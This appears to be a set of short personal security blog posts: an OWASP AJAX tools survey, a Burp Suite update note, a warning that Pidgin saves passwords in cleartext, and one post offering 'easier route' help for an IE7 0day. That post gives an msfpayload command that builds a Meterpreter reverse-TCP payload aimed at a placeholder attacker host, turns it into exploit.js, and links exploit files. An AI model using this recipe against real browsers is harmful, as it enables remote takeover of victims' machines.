Today, I was working on reviewing all of the AJAX tools listed on the OWASP site. I would like to get input from the rest of the community to determine what are the best AJAX tools and why. If you're testing web applications with AJAX, please take a moment to review this survey:

Click Here to complete the OWASP AJAX Survey

I would like to get as much input as possible. I will post the results after the New Year.


Regards,
Jabra

There was a recent 0day for IE 7, you may have heard a thing or two about it lately in the press. M$ is releasing a out of band patch tomorrow, http://isc.sans.org/diary.html?storyid=5497.

meh.

For those of you who wanted a bit easier route with the exploit, here is a few helpful hints with Backtrack 3 and some new Perl I whipped up:

$ /pentest/exploit/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 J | ./payloadproper.pl > exploit.js

http://spl0it.org/files/payloadproper.pl

The resulting file can be helpful when used with the exploit on milworm.

http://milw0rm.com/sploits/2008-iesploit.tar.gz

Regards,
Jabra

My favorite web application testing framework has just been updated.

http://seclists.org/webappsec/2008/q4/0041.html

Awesome job PortSwigger! I look forward to many future releases.

Regards,
Jabra

Recently, a Red-Hat friend reminded me of an issue with pidgin in that when you save your password, it is saved in clear-text.

Linux/Unix:

~/.purple/accounts.xml

Windows XP:

C:\Documents and Settings\%USERNAME%\Application Data\.purple\accounts.xml

Therefore, keep this in-mind when your working on multi-user systems and don't save your password.